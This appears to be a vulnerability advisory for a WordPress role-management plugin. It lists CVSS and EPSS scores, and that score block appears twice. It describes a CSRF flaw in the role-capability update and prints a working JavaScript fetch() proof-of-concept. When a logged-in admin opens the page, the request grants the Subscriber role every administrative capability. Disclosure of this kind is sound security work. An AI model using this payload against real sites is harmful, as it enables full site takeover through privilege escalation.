8.8 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
REQUIRED
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
6.8 Medium
CVSS2
Access Vector
NETWORK
Access Complexity
MEDIUM
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:N/AC:M/Au:N/C:P/I:P/A:P
0.001 Low
EPSS
Percentile
22.0%
The plugin does not protect against CSRF in requests to update role capabilities, leading to arbitrary privilege escalation of any role.
Make a logged in admin open a page with the code below. Then, log in as a subscriber and see that you have full admin access.
```
fetch("/wp-admin/admin.php?page=srrl_add_new_roles", {
"headers": {
"content-type": "application/x-www-form-urlencoded",
},
"method": "POST",
"body": "srrl_action=update&srrl_role_name=Subscriber&srrl_role_slug=subscriber&srrl_role_caps%5B%5D=activate_plugins&srrl_role_caps%5B%5D=delete_plugins&srrl_role_caps%5B%5D=edit_plugins&srrl_role_caps%5B%5D=install_plugins&srrl_role_caps%5B%5D=update_plugins&srrl_role_caps%5B%5D=delete_themes&srrl_role_caps%5B%5D=edit_theme_options&srrl_role_caps%5B%5D=edit_themes&srrl_role_caps%5B%5D=install_themes&srrl_role_caps%5B%5D=switch_themes&srrl_role_caps%5B%5D=update_themes&srrl_role_caps%5B%5D=add_users&srrl_role_caps%5B%5D=create_users&srrl_role_caps%5B%5D=delete_users&srrl_role_caps%5B%5D=edit_users&srrl_role_caps%5B%5D=list_users&srrl_role_caps%5B%5D=promote_users&srrl_role_caps%5B%5D=remove_users&srrl_role_caps%5B%5D=delete_others_pages&srrl_role_caps%5B%5D=delete_pages&srrl_role_caps%5B%5D=delete_private_pages&srrl_role_caps%5B%5D=delete_published_pages&srrl_role_caps%5B%5D=edit_others_pages&srrl_role_caps%5B%5D=edit_pages&srrl_role_caps%5B%5D=edit_private_pages&srrl_role_caps%5B%5D=edit_published_pages&srrl_role_caps%5B%5D=publish_pages&srrl_role_caps%5B%5D=read_private_pages&srrl_role_caps%5B%5D=delete_others_posts&srrl_role_caps%5B%5D=delete_posts&srrl_role_caps%5B%5D=delete_private_posts&srrl_role_caps%5B%5D=delete_published_posts&srrl_role_caps%5B%5D=edit_others_posts&srrl_role_caps%5B%5D=edit_posts&srrl_role_caps%5B%5D=edit_private_posts&srrl_role_caps%5B%5D=edit_published_posts&srrl_role_caps%5B%5D=publish_posts&srrl_role_caps%5B%5D=read_private_posts&srrl_role_caps%5B%5D=edit_dashboard&srrl_role_caps%5B%5D=edit_files&srrl_role_caps%5B%5D=export&srrl_role_caps%5B%5D=import&srrl_role_caps%5B%5D=manage_categories&srrl_role_caps%5B%5D=manage_links&srrl_role_caps%5B%5D=manage_options&srrl_role_caps%5B%5D=moderate_comments&srrl_role_caps%5B%5D=read&srrl_role_caps%5B%5D=unfiltered_html&srrl_role_caps%5B%5D=unfiltered_upload&srrl_role_caps%5B%5D=update_core&srrl_role_caps%5B%5D=upload_files&srrl_save=1",
"credentials": "include"
}).then(response => response.text())
.then(data => console.log(data));
```
8.8 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
REQUIRED
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
6.8 Medium
CVSS2
Access Vector
NETWORK
Access Complexity
MEDIUM
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:N/AC:M/Au:N/C:P/I:P/A:P
0.001 Low
EPSS
Percentile
22.0%